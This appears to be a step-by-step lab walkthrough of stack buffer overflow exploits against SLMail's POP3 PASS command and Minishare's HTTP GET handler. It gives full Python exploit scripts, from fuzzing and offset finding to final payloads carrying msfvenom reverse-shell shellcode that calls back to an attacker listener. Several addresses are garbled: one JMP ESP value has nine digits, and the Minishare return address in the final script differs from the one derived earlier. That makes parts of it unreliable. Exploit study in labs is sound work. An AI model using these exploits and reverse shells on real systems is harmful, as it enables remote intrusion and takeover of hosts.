Basic Buffer Overflow
A command dump of the basic SL Mail buffer overflow.
SL Mail
At each stage, exit the service and exit Immunity Debugger.
Reload the application and reload Immunity Debugger.
Attach Immunity Debugger to the service.
Press Play.
==============
Step 1 - Check you can connect to the service
==============
#!/usr/bin/python
# Step 1 connectivity check (Python 2: print statement, str payloads).
# Opens a TCP connection to the POP3 service on 192.168.56.101:110, reads the
# greeting, sends a USER/PASS pair and prints the replies. No overflow is
# attempted here; it only confirms the service answers before fuzzing starts.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending Evil Buffer..."
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)          # server greeting banner
    print data
    s.send('User test' +'\r\n')
    data = s.recv(1024)          # reply to USER
    print data
    s.send('PASS test' + '\r\n')
    print data                   # NOTE: no recv() after PASS, so this re-prints the USER reply
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure (refused connection, timeout, a typo in the
    # code above) is reported with this one message, so the real cause is lost.
    print "Could not connect to POP3!"
----Notes-----
python SLmail1.py
Sending Evil Buffer...
+OK POP3 server xp-fa9c63481a5e ready <[email protected]>
+OK test welcome here
The connection works.
==============
Step 2 - Fuzz the application to cause a crash
==============
#!/usr/bin/python
# Step 2 fuzzer (Python 2). Builds 31 payloads -- one of 1 byte, then 100,
# 300, 500, ... 5900 bytes (step 200) -- and sends each one as the argument of
# the POP3 PASS command on a fresh connection, printing the length first.
# The last length printed before the service stops answering brackets the
# crash point (the notes below record it near 2900).
# There is no try/except: once the service is down, s.connect() raises and
# the script ends with a traceback instead of continuing.
# Defender's view: PASS arguments of hundreds or thousands of bytes are far
# outside any real client's behaviour; a server-side length check on the
# command argument is the straightforward fix, and on the wire such requests
# are an easy anomaly for a protocol-aware IDS to flag.
import socket

buffer=["A"]          # shadows the Python 2 builtin `buffer`; list of payload strings
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200
for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('192.168.56.101',110))   # connect() returns None; `connect` is never used
    s.recv(1024)                                # greeting, discarded
    s.send('USER test\r\n')
    s.recv(1024)                                # USER reply, discarded
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()
----Notes-----
python SLmail2.py
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
The crash happens somewhere around the 2900-byte mark.
Look for EIP 41414141 in the debugger.
==============
Step 3 - Ensure the expected fuzz causes a crash.
==============
Restart the service:
#!/usr/bin/python
# Step 3 (Python 2): reproduces the crash found by the fuzzer with a fixed
# 2700-byte PASS argument of "A" (0x41), so the expected EIP value 41414141
# from the notes can be confirmed in the debugger.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A' * 2700                     # shadows the Python 2 builtin `buffer`
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)                 # greeting; read but never printed
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                 # USER reply; read but never printed
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except hides the real error; the socket is never explicitly
    # closed on either path.
    print "Could not conect to POP3!"
----Notes-----
python SLmail3.py
This should crash the server, overwriting EIP with 41414141.
==============
Step 4 - Locate the EIP overwrite length / offset.
==============
Create a 2700-byte pattern and insert it into the Python script as the buffer.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#!/usr/bin/python
# Step 4 (Python 2): same send path as Step 3, but the 2700-byte buffer is a
# cyclic pattern (pattern_create.rb -l 2700) so the 4 bytes that land in EIP
# can be mapped back to an offset with pattern_offset.rb (notes below:
# 39694438 -> offset 2606).
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Placeholder exactly as written on the page: "-patterngoeshere-" stands in
# for the generated pattern, which is not reproduced here.
buffer = 'Aa0Aa1Aa2A-patterngoeshere-a3Aa4Aa5Aa6A'
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)                 # greeting; read but never printed
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                 # USER reply; read but never printed
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except hides the real error; the socket is never explicitly closed.
    print "Could not conect to POP3!"
----Notes-----
Note the EIP value 39694438 in Immunity Debugger.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606
==============
Step 5 - Overwrite EIP with 4 x "B" (x42)
==============
#!/usr/bin/python
# Step 5 (Python 2): 2606 bytes of "A" fill up to the EIP offset found in
# Step 4, the next 4 bytes ("B", 0x42) should show up in EIP as 42424242, and
# 90 bytes of "C" (0x43) follow to show where data after the EIP slot lands.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606 + "B"*4 + "C"*90      # 2700 bytes total; shadows builtin `buffer`
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)                 # greeting; read but never printed
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                 # USER reply; read but never printed
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except hides the real error; the socket is never explicitly closed.
    print "Could not conect to POP3!"
----Notes-----
Look for 42424242 in the EIP register.
==============
Step 6 - Check the buffer length is long enough to hold the reverse shellcode.
==============
#!/usr/bin/python
# Step 6 (Python 2): same layout as Step 5 but the trailing "C" run is grown
# so the whole buffer is 3500 bytes; the notes below check how much of the
# 890-byte "C" region is visible after ESP in the debugger.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)   # 3500 bytes total: 890 bytes of "C" after the EIP slot
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)                 # greeting; read but never printed
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                 # USER reply; read but never printed
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except hides the real error; the socket is never explicitly closed.
    print "Could not conect to POP3!"
----Notes-----
This should work and give you a large amount of space.
Right-click the ESP register, choose "Follow in Dump", and check that a large region is overwritten with x43.
==============
Step 7 - Check for bad characters
==============
#!/usr/bin/python
# Step 7 (Python 2): after the 2606-byte pad and the 4-byte EIP slot, send
# every byte value 0x00..0xff in order. Values the server strips or that
# truncate the data (the notes below find \x00, \x0a, \x0d) show up as gaps
# in the memory dump and must be excluded from any later payload.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Eight adjacent string literals, implicitly concatenated: 256 bytes, one per
# value 0x00..0xff. (The page dump wrapped several lines in the middle of an
# escape sequence; they are rejoined here.)
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "A"*2606 +"B"*4 + badchars     # 2866 bytes total; shadows builtin `buffer`
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)                 # greeting; read but never printed
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                 # USER reply; read but never printed
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except hides the real error; the socket is never explicitly closed.
    print "Could not conect to POP3!"
----Notes-----
Follow ESP in the dump and check which characters cause the exploit to crash or go missing; repeat until you have removed them all.
It should read 01 02 03 04 05 -missing- 07, which means x06 is a bad character.
Restart the debugger and the service every time you do this, and rerun the script.
Note the bad characters you remove. The final three should read FD FE FF; then they are all removed and the data is not truncated.
In this case they are:
\x00\x0a\x0d
==============
Step 8 - Locate JMP ESP
==============
In Immunity Debugger, type:
!mona modules
Choose a DLL whose row reads FALSE FALSE FALSE FALSE TRUE.
If it has no JMP ESP, move to another.
i.e. SLMFC.dll
Upload jumpesp.exe to the host and run the following command:
findjmp.exe slmfc.dll esp
Choose a JMP ESP from the list, e.g.:
0x5F4BB41E3
Convert it to little endian:
5F | 4B | 41 | E3
\xe3\x41\x4b\x5f
Or, in Immunity Debugger:
!mona find -s "\xff\xe4" -m slmfc.dll
=============
Step 9 - Final Overflow
=============
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Check that the output is x86/shikata_ga_nai encoded, or you will still have bad characters in there.
#!/usr/bin/python
# Step 9 (Python 2): final payload. 2606 bytes of "A" fill up to the EIP slot,
# the 4 bytes "\xe3\x41\x4b\x5f" are the little-endian form of the JMP ESP
# address (5F 4B 41 E3) chosen in Step 8, 8 NOP bytes (0x90) follow, then the
# msfvenom-generated, shikata_ga_nai-encoded reverse-shell bytes from the
# Step 9 notes (generated with \x00 \x0a \x0d excluded).
# Defender's view: the only thing that makes this payload work is the missing
# length check on the PASS argument; a PASS line of ~3 KB containing
# non-printable bytes is an unambiguous anomaly for server-side validation
# or a protocol-aware IDS.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Opaque encoded shellcode blob copied from the page as-is (the output of the
# msfvenom command in the Step 9 notes); it is not readable or verifiable here.
shellcode = (
"\xd9\xc8\xbe\xf1\x66\xed\xf4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x73\x17\x03\x73\x17\x83\x32\x62\x0f\x01\x48\x83\x4d"
"\xea\xb0\x54\x32\x62\x55\x65\x72\x10\x1e\xd6\x42\x52\x72\xdb"
"\x29\x36\x66\x68\x5f\x9f\x89\xd9\xea\xf9\xa4\xda\x47\x39\xa7"
"\x58\x9a\x6e\x07\x60\x55\x63\x46\xa5\x88\x8e\x1a\x7e\xc6\x3d"
"\x8a\x0b\x92\xfd\x21\x47\x32\x86\xd6\x10\x35\xa7\x49\x2a\x6c"
"\x67\x68\xff\x04\x2e\x72\x1c\x20\xf8\x09\xd6\xde\xfb\xdb\x26"
"\x1e\x57\x22\x87\xed\xa9\x63\x20\x0e\xdc\x9d\x52\xb3\xe7\x5a"
"\x28\x6f\x6d\x78\x8a\xe4\xd5\xa4\x2a\x28\x83\x2f\x20\x85\xc7"
"\x77\x25\x18\x0b\x0c\x51\x91\xaa\xc2\xd3\xe1\x88\xc6\xb8\xb2"
"\xb1\x5f\x65\x14\xcd\xbf\xc6\xc9\x6b\xb4\xeb\x1e\x06\x97\x63"
"\xd2\x2b\x27\x74\x7c\x3b\x54\x46\x23\x97\xf2\xea\xac\x31\x05"
"\x0c\x87\x86\x99\xf3\x28\xf7\xb0\x37\x7c\xa7\xaa\x9e\xfd\x2c"
"\x2a\x1e\x28\xe2\x7a\xb0\x83\x43\x2a\x70\x74\x2c\x20\x7f\xab"
"\x4c\x4b\x55\xc4\xe7\xb6\x3e\x2b\x5f\x80\xbf\xc3\xa2\xf0\xbe"
"\xa8\x2a\x16\xaa\xde\x7a\x81\x43\x46\x27\x59\xf5\x87\xfd\x24"
"\x35\x03\xf2\xd9\xf8\xe4\x7f\xc9\x6d\x05\xca\xb3\x38\x1a\xe0"
"\xdb\xa7\x89\x6f\x1b\xa1\xb1\x27\x4c\xe6\x04\x3e\x18\x1a\x3e"
"\xe8\x3e\xe7\xa6\xd3\xfa\x3c\x1b\xdd\x03\xb0\x27\xf9\x13\x0c"
"\xa7\x45\x47\xc0\xfe\x13\x31\xa6\xa8\xd5\xeb\x70\x06\xbc\x7b"
"\x04\x64\x7f\xfd\x09\xa1\x09\xe1\xb8\x1c\x4c\x1e\x74\xc9\x58"
"\x67\x68\x69\xa6\xb2\x28\x99\xed\x9e\x19\x32\xa8\x4b\x18\x5f"
"\x4b\xa6\x5f\x66\xc8\x42\x20\x9d\xd0\x27\x25\xd9\x56\xd4\x57"
"\x72\x33\xda\xc4\x73\x16")
buffer = "A"*2606 +"\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode   # pad | EIP | NOPs | shellcode
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101',110))
    data = s.recv(1024)                 # greeting; read but never printed
    s.send('USER username' +'\r\n')
    data = s.recv(1024)                 # USER reply; read but never printed
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except hides the real error; the socket is never explicitly closed.
    print "Could not conect to POP3!"
Minishare
==============
Step 1 - Crash The Service
==============
#!/usr/bin/python
# Minishare Step 1 (Python 2): sends a single HTTP GET whose request-URI is
# 2000 bytes of "A" (0x41) to 192.168.56.101:81 and closes the socket; the
# operator then checks in the debugger whether the server crashed.
import socket

target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "                                        # shadows the Python 2 builtin `buffer`
buffer +="\x41" * 2000
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))    # connect() returns None; `connect` is never used
sock.send(buffer)                                     # no reply is read; fire-and-forget
sock.close()
print "Sent! Check the server has crashed"
==============
Step 2 - Find The ESP
==============
#!/usr/bin/python
#Stage 2
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
# Minishare Step 2 (Python 2): the same GET as Step 1, but the 2000-byte URI
# is the cyclic pattern_create.rb output so the 4 bytes that land in EIP can
# be mapped to an offset (Step 3 queries pattern_offset.rb -q 36684335 and
# goes on to use offset 1787).
import socket

target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "                                        # shadows the Python 2 builtin `buffer`
# The page dump wrapped the pattern across many lines; adjacent string
# literals concatenate, so the value is the single 2000-byte pattern.
buffer +=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1"
          "Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4"
          "Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8A"
          "g9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4"
          "Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am"
          "0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1"
          "Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4"
          "Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8A"
          "s9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3"
          "Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5A"
          "x6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
          "Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2"
          "Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5"
          "Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9B"
          "h0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5B"
          "j6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1"
          "Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo"
          "3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq"
          "6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0B"
          "t1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv"
          "5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7"
          "Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0C"
          "a1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc"
          "3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5"
          "Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg"
          "9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj"
          "4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9"
          "Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co"
          "0Co1Co2Co3Co4Co5Co")
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))    # connect() returns None; `connect` is never used
sock.send(buffer)                                     # no reply is read; fire-and-forget
sock.close()
print "Sent! Check the server has crashed"
==============
Step 3 - Overwrite EIP with B's
==============
#!/usr/bin/python
#Stage 3
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 36684335
# Minishare Step 3 (Python 2): 1787 bytes of "A" fill up to the EIP offset
# derived from the pattern_offset query above, 4 bytes of "B" (0x42) should
# appear in EIP as 42424242, and "C" (0x43) pads the URI out to 1866 bytes.
import socket

target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "                                        # shadows the Python 2 builtin `buffer`
buffer +="A" * 1787 + "B" * 4 + "C" * (1866-1787-4)   # 1866 bytes: pad | EIP | 75 bytes of "C"
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))    # connect() returns None; `connect` is never used
sock.send(buffer)                                     # no reply is read; fire-and-forget
sock.close()
print "Sent! Check the server has crashed"
==============
Step 4 - Increase the buffer size to make sure we have room for shellcode
==============
#!/usr/bin/python
#Stage 4
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
#[email protected]:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 36684335
#Increase buffer size to see if our shellcode works and has enough space
# Minishare Step 4 (Python 2): same layout as Step 3 but the trailing "C"
# run is grown to 409 bytes (2200-byte URI) to check how much room follows
# the EIP slot before anything is placed there.
import socket

target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "                                        # shadows the Python 2 builtin `buffer`
buffer +="A" * 1787 + "B" * 4 + "C" * 409             # 2200 bytes: pad | EIP | 409 bytes of "C"
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))    # connect() returns None; `connect` is never used
sock.send(buffer)                                     # no reply is read; fire-and-forget
sock.close()
print "Sent! Check the server has crashed"
==============
Step 5 - Find the return address and remove all bad characters
==============
#!mona modules
#!mona find -s "\xff\xe4" -m user32.dll = 0x73429353
73 | 42 | 93 | 53
\x53\x93\x42\x73
See Step 7 of SLMail for finding bad characters.
==============
Step 6 - Generate New Reverse Shell
==============
#!/usr/bin/python
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -b "\x00\x0a\x0d" -f c
# Minishare Step 6 (Python 2): final payload. 1787 bytes of "A" fill up to
# the EIP slot found in Step 3, 4 bytes of return address follow, then 20 NOP
# bytes (0x90) and the msfvenom-generated reverse-shell bytes (generated with
# \x00 \x0a \x0d excluded), all carried in the request-URI of one HTTP GET.
# Defender's view: a GET whose URI is ~2 KB and contains non-printable bytes
# is an unambiguous anomaly; request-line length validation at the server
# and URI-length/byte-class rules in a WAF or IDS both catch it.
import socket

# Opaque encoded shellcode blob copied from the page as-is (the output of the
# msfvenom command above); it is not readable or verifiable here.
shellcode = (
"\xdb\xd8\xbf\x4c\x49\x8a\x73\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x7a\x13\x03\x36\x5a\x68\x86\x3a\xb4\xee"
"\x69\xc2\x45\x8f\xe0\x27\x74\x8f\x97\x2c\x27\x3f\xd3\x60\xc4"
"\xb4\xb1\x90\x5f\xb8\x1d\x97\xe8\x77\x78\x96\xe9\x24\xb8\xb9"
"\x69\x37\xed\x19\x53\xf8\xe0\x58\x94\xe5\x09\x08\x4d\x61\xbf"
"\xbc\xfa\x3f\x7c\x37\xb0\xae\x04\xa4\x01\xd0\x25\x7b\x19\x8b"
"\xe5\x7a\xce\xa7\xaf\x64\x13\x8d\x66\x1f\xe7\x79\x79\xc9\x39"
"\x81\xd6\x34\xf6\x70\x26\x71\x31\x6b\x5d\x8b\x41\x16\x66\x48"
"\x3b\xcc\xe3\x4a\x9b\x87\x54\xb6\x1d\x4b\x02\x3d\x11\x20\x40"
"\x19\x36\xb7\x85\x12\x42\x3c\x28\xf4\xc2\x06\x0f\xd0\x8f\xdd"
"\x2e\x41\x6a\xb3\x4f\x91\xd5\x6c\xea\xda\xf8\x79\x87\x81\x94"
"\x4e\xaa\x39\x65\xd9\xbd\x4a\x57\x46\x16\xc4\xdb\x0f\xb0\x13"
"\x1b\x3a\x04\x8b\xe2\xc5\x75\x82\x20\x91\x25\xbc\x81\x9a\xad"
"\x3c\x2d\x4f\x61\x6c\x81\x20\xc2\xdc\x61\x91\xaa\x36\x6e\xce"
"\xcb\x39\xa4\x67\x61\xc0\x2f\x48\xde\xf2\xae\x20\x1d\x02\xb0"
"\x0b\xa8\xe4\xd8\x7b\xfd\xbf\x74\xe5\xa4\x4b\xe4\xea\x72\x36"
"\x26\x60\x71\xc7\xe9\x81\xfc\xdb\x9e\x61\x4b\x81\x09\x7d\x61"
"\xad\xd6\xec\xee\x2d\x90\x0c\xb9\x7a\xf5\xe3\xb0\xee\xeb\x5a"
"\x6b\x0c\xf6\x3b\x54\x94\x2d\xf8\x5b\x15\xa3\x44\x78\x05\x7d"
"\x44\xc4\x71\xd1\x13\x92\x2f\x97\xcd\x54\x99\x41\xa1\x3e\x4d"
"\x17\x89\x80\x0b\x18\xc4\x76\xf3\xa9\xb1\xce\x0c\x05\x56\xc7"
"\x75\x7b\xc6\x28\xac\x3f\xf6\x62\xec\x16\x9f\x2a\x65\x2b\xc2"
"\xcc\x50\x68\xfb\x4e\x50\x11\xf8\x4f\x11\x14\x44\xc8\xca\x64"
"\xd5\xbd\xec\xdb\xd6\x97"
)
target_address="192.168.56.101"
target_port=81
print "Sending exploit"
buffer ="GET "                                        # shadows the Python 2 builtin `buffer`
buffer +="A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode   # pad | EIP | NOPs | shellcode
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))    # connect() returns None; `connect` is never used
sock.send(buffer)                                     # no reply is read; fire-and-forget
sock.close()
print "Sent! Did you get a shell?"